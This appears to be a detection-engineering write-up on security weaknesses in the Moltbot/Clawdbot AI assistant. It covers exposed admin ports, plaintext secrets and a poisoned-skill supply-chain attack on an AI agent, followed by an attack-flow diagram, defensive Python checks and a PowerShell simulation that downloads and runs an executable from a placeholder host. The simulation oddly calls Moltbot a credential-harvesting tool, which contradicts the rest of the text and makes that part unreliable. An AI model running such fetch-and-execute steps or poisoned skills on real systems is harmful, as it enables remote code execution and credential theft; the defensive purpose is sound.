The Moltbot / ClawdBots Epidemic
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article flags security issues around the AI personal assistant first branded Clawdbot and later renamed Moltbot. Moltbot is operated through messaging apps like WhatsApp and Telegram, yet many deployments are reachable from the internet with weak or missing authentication. It writes user credentials to plaintext files, and its skill library can be poisoned, creating a supply-chain exposure. Threat actors could steal secrets, exfiltrate source code, and repurpose the assistant as a backdoor.
Investigation
Researchers found hundreds of Moltbot instances exposing unauthenticated admin ports and unsafe proxy configurations. A proof-of-concept supply-chain attack uploaded a malicious skill to the ClawdHub library, demonstrating remote command execution for downstream users. Analysts also observed that secrets are persisted in plain-text Markdown and JSON files, making them easy pickings for commodity infostealers such as RedLine, Lumma, and Vidar.
Mitigation
Operators should require strong authentication for all Moltbot services, close or firewall admin ports, and avoid exposing the assistant to the internet. Enable encryption-at-rest for stored secrets, sandbox or containerize the runtime, and restrict filesystem access. Vet, sign, and pin any skills pulled from the library, and consider disabling the skill feature if it cannot be governed safely.
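One way to carry out the "vet, sign, and pin" advice above, written here as an added example rather than Moltbot's or ClawdHub's own code: a skill directory fetched from the library is reduced to a canonical SHA-256 tree digest, recorded at vetting time, and refused on load if it is unpinned or any file has changed. The skill layout (SKILL.md plus a script), the manifest format and the skill names are assumptions for illustration.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Tuple

def skill_digest(skill_dir: Path) -> str:
    """SHA-256 over every file in the skill, in canonical path order, with
    length-prefixed names and bodies so renames and edits cannot collide."""
    h = hashlib.sha256()
    for path in sorted(p for p in skill_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(skill_dir).as_posix().encode()
        body = path.read_bytes()
        h.update(len(rel).to_bytes(4, "big") + rel)
        h.update(len(body).to_bytes(8, "big") + body)
    return h.hexdigest()

def verify_pinned(skill_dir: Path, pins: Dict[str, str]) -> Tuple[bool, str]:
    """Allow a skill only if it is pinned and its digest still matches."""
    name = skill_dir.name
    if name not in pins:
        return False, f"skill '{name}' is not in the pin manifest"
    actual = skill_digest(skill_dir)
    if actual != pins[name]:
        return False, f"digest mismatch for '{name}'"
    return True, "digest matches pin"

def write_skill(root: Path, name: str, files: Dict[str, str]) -> Path:
    """Lay out a constructed skill directory (hypothetical layout)."""
    d = root / name
    d.mkdir(parents=True, exist_ok=True)
    for rel, content in files.items():
        (d / rel).write_text(content)
    return d

def demo() -> Tuple[bool, bool, bool]:
    """Pin a vetted skill, then show that a later file change and an
    unpinned skill are both rejected. Returns the three verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        skill = write_skill(root, "weather", {"SKILL.md": "# weather\n",
                                               "run.py": "print('sunny')\n"})
        pins = {"weather": skill_digest(skill)}      # recorded at vetting time
        vetted_ok, _ = verify_pinned(skill, pins)
        # Simulated poisoned update: the library now serves a changed script.
        (skill / "run.py").write_text("print('tampered')\n")
        tampered_ok, _ = verify_pinned(skill, pins)
        other = write_skill(root, "calendar", {"SKILL.md": "# calendar\n"})
        unpinned_ok, _ = verify_pinned(other, pins)
        return vetted_ok, tampered_ok, unpinned_ok
```

Pins should be stored outside the skill directory and treated like any other deployment secret, since a skill that can rewrite its own manifest can re-pin itself.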
Response
Alert on open admin ports and unauthenticated access attempts to Moltbot. Monitor the AI process for unexpected command execution and outbound connections to unknown C2 domains. Scan hosts for credential-stealing malware and validate the integrity of stored configuration files. If compromise is confirmed, isolate the system, revoke exposed credentials, and redeploy Moltbot with hardened settings.
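The exposure check described above, as an added example that is not part of the original article or of any Moltbot component: constructed web-server/proxy records are scored for a Moltbot-like service whose banner advertises exposure, whose admin port is reached from an internet address, or which is used without credentials. The field names, the 8080 default and the banner string are taken from the simulation section below and are assumptions; the two-indicator severity cut-off is likewise an assumption.

```python
import ipaddress
import json
from typing import List, Optional

ADMIN_PORT = 8080                      # default listener used by the simulation
BANNER_MARKER = "exposed to the web"   # literal string the detection rule keys on
# RFC 1918 and local ranges; anything else is treated as internet-facing.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed web-server / proxy telemetry, one JSON record per HTTP request.
# The 203.0.113.x / 198.51.100.x clients stand in for external addresses.
SAMPLE_EVENTS = [
    '{"dst_port": 8080, "src_ip": "203.0.113.7", "server": "moltbot", '
    '"banner": "Moltbot gateway - exposed to the web", "auth": ""}',
    '{"dst_port": 8080, "src_ip": "10.0.0.5", "server": "moltbot", '
    '"banner": "Moltbot gateway - exposed to the web", "auth": "Bearer t0k"}',
    '{"dst_port": 443, "src_ip": "198.51.100.9", "server": "nginx", '
    '"banner": "nginx/1.24", "auth": ""}',
    '{"dst_port": 8080, "src_ip": "198.51.100.23", "server": "clawdbot", '
    '"banner": "Clawdbot admin", "auth": ""}',
]

def is_external(ip: str) -> bool:
    """True when the client is outside the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def classify(event: dict) -> Optional[dict]:
    """Return a finding for one event, or None when nothing is wrong."""
    server = str(event.get("server", "")).lower()
    banner = str(event.get("banner", "")).lower()
    if server not in ("moltbot", "clawdbot") and BANNER_MARKER not in banner:
        return None                    # not a Moltbot-like service at all
    indicators = []
    if BANNER_MARKER in banner:
        indicators.append("banner_advertises_exposure")
    if event.get("dst_port") == ADMIN_PORT and is_external(event["src_ip"]):
        indicators.append("admin_port_from_external_ip")
    if not event.get("auth"):
        indicators.append("no_credentials_presented")
    if not indicators:
        return None                    # internal, authenticated use is expected
    return {"src_ip": event["src_ip"], "indicators": indicators,
            "severity": "high" if len(indicators) >= 2 else "medium"}

def detect(raw_events: List[str]) -> List[dict]:
    findings = [classify(json.loads(line)) for line in raw_events]
    return [f for f in findings if f is not None]
```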
```mermaid
graph TB
    %% Class Definitions
    classDef technique fill:#ffcc99
    classDef actor fill:#99ff99
    classDef asset fill:#ccccff
    classDef process fill:#ff9999

    %% Nodes
    actor_attacker["<b>Actor</b>: Attacker"]
    class actor_attacker actor
    asset_moltbot["<b>Asset</b>: Moltbot instance<br/><b>Exposure</b>: Unauthenticated admin port accessible"]
    class asset_moltbot asset
    tech_external_remote["<b>Technique</b> – T1133: External Remote Services<br/><b>Description</b>: Use publicly exposed remote services to gain initial access"]
    class tech_external_remote technique
    tech_exploit_remote["<b>Technique</b> – T1210: Exploitation of Remote Services<br/><b>Description</b>: Exploit vulnerabilities or misconfigurations in remote services to execute commands"]
    class tech_exploit_remote technique
    tech_remote_access["<b>Technique</b> – T1219: Remote Access Tools<br/><b>Description</b>: Use remote access capabilities to run further commands on compromised host"]
    class tech_remote_access technique
    tech_hijack_execution["<b>Technique</b> – T1574: Hijack Execution Flow<br/><b>Description</b>: Manipulate execution flow by poisoning trusted components such as a skill library"]
    class tech_hijack_execution technique
    asset_malicious_skill["<b>Asset</b>: Malicious Skill<br/><b>Location</b>: ClawHub skill library"]
    class asset_malicious_skill asset
    tech_content_injection["<b>Technique</b> – T1659: Content Injection<br/><b>Description</b>: Inject malicious code into legitimate content that is subsequently executed by victims"]
    class tech_content_injection technique
    process_payload["<b>Process</b>: Malicious Payload<br/><b>Action</b>: Executes on victim Moltbot hosts"]
    class process_payload process
    tech_credentials_files["<b>Technique</b> – T1552.001: Credentials In Files<br/><b>Description</b>: Access plaintext credentials stored in files such as JSON or Markdown"]
    class tech_credentials_files technique
    tech_system_services["<b>Technique</b> – T1569: System Services<br/><b>Description</b>: Register malicious code as a system service for persistence and execution"]
    class tech_system_services technique
    asset_c2_server["<b>Asset</b>: Attacker C2 Server<br/><b>Role</b>: Receives execution confirmations and exfiltrated credentials"]
    class asset_c2_server asset
    tech_exfiltration["<b>Technique</b> – T1041: Exfiltration Over C2 Channel<br/><b>Description</b>: Transfer stolen data to attacker through the established command and control channel"]
    class tech_exfiltration technique

    %% Connections
    actor_attacker -->|discovers| asset_moltbot
    asset_moltbot -->|allows| tech_external_remote
    tech_external_remote -->|leads to| tech_exploit_remote
    tech_exploit_remote -->|uses| tech_remote_access
    tech_remote_access -->|runs| tech_hijack_execution
    tech_hijack_execution -->|poisons| asset_malicious_skill
    asset_malicious_skill -->|injects code into| tech_content_injection
    tech_content_injection -->|delivers to| process_payload
    process_payload -->|reads| tech_credentials_files
    tech_credentials_files -->|provides data for| tech_system_services
    tech_system_services -->|maintains persistence and executes| process_payload
    process_payload -->|contacts| asset_c2_server
    asset_c2_server -->|receives data via| tech_exfiltration
```
Attack Flow
Detections
Possible Moltbot (formerly Clawdbot) Installation Attempt (via proxy)
Possible Moltbot (formerly Clawdbot) Installation Attempt (via file_event)
Possible Moltbot (formerly Clawdbot) Installation Attempt (via dns)
Possible Moltbot (formerly Clawdbot) Installation Attempt (via cmdline)
Detection of Moltbot Instances Exposed to the Web [Webserver]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Attack Narrative & Commands:
The red team deploys Moltbot (a publicly-available credential-harvesting tool) on a compromised Windows host. Launched with its default configuration, Moltbot opens an unauthenticated HTTP admin console on port 8080 that advertises “exposed to the web” in its banner. This creates network-connection events that match the detection rule’s literal strings. The attacker then accesses the UI from an external IP to verify exposure, thereby generating the required telemetry.
- Download Moltbot (simulated by a placeholder zip).
- Extract and run the binary with default flags (--listen 0.0.0.0:8080).
- Optionally issue an HTTP GET from an external IP (simulated via Invoke-WebRequest).
Regression Test Script:
```powershell
# ----------------------------------------------------
# Moltbot Exposure Simulation – PowerShell
# ----------------------------------------------------
# 1. Create a temporary directory (Join-Path avoids the path separator
#    being lost in "$env:TEMP\MoltbotSim")
$tempDir = Join-Path $env:TEMP "MoltbotSim"
New-Item -ItemType Directory -Force -Path $tempDir | Out-Null

# 2. Simulate downloading a Moltbot executable (placeholder URL)
$molExe = Join-Path $tempDir "molbot.exe"
Invoke-WebRequest -Uri "https://example.com/moltbot.exe" -OutFile $molExe -UseBasicParsing

# 3. Run Moltbot with default (exposed) settings
$proc = Start-Process -FilePath $molExe `
    -ArgumentList "--listen 0.0.0.0:8080" `
    -PassThru `
    -WindowStyle Hidden
Write-Host "[+] Moltbot started (PID: $($proc.Id)) listening on 0.0.0.0:8080"

# 4. Wait a short period to allow the service to register in logs
Start-Sleep -Seconds 5

# 5. Simulate an external connection to generate network traffic
Try {
    Invoke-WebRequest -Uri "http://$($env:COMPUTERNAME):8080" -UseBasicParsing -TimeoutSec 5
    Write-Host "[+] External HTTP request sent to Moltbot UI."
} Catch {
    Write-Warning "[-] Unable to reach Moltbot UI (may be blocked by firewall)."
}

# 6. Keep the process alive for additional logging (optional)
Start-Sleep -Seconds 20

# 7. Cleanup – stop Moltbot
Stop-Process -Id $proc.Id -Force
Remove-Item -Recurse -Force $tempDir
Write-Host "[+] Moltbot simulation completed and cleaned up."
```
Cleanup Commands:
```powershell
# Forcefully terminate any leftover Moltbot processes and delete temp files
Get-Process -Name "molbot" -ErrorAction SilentlyContinue | Stop-Process -Force
Remove-Item -Path (Join-Path $env:TEMP "MoltbotSim") -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup completed."
```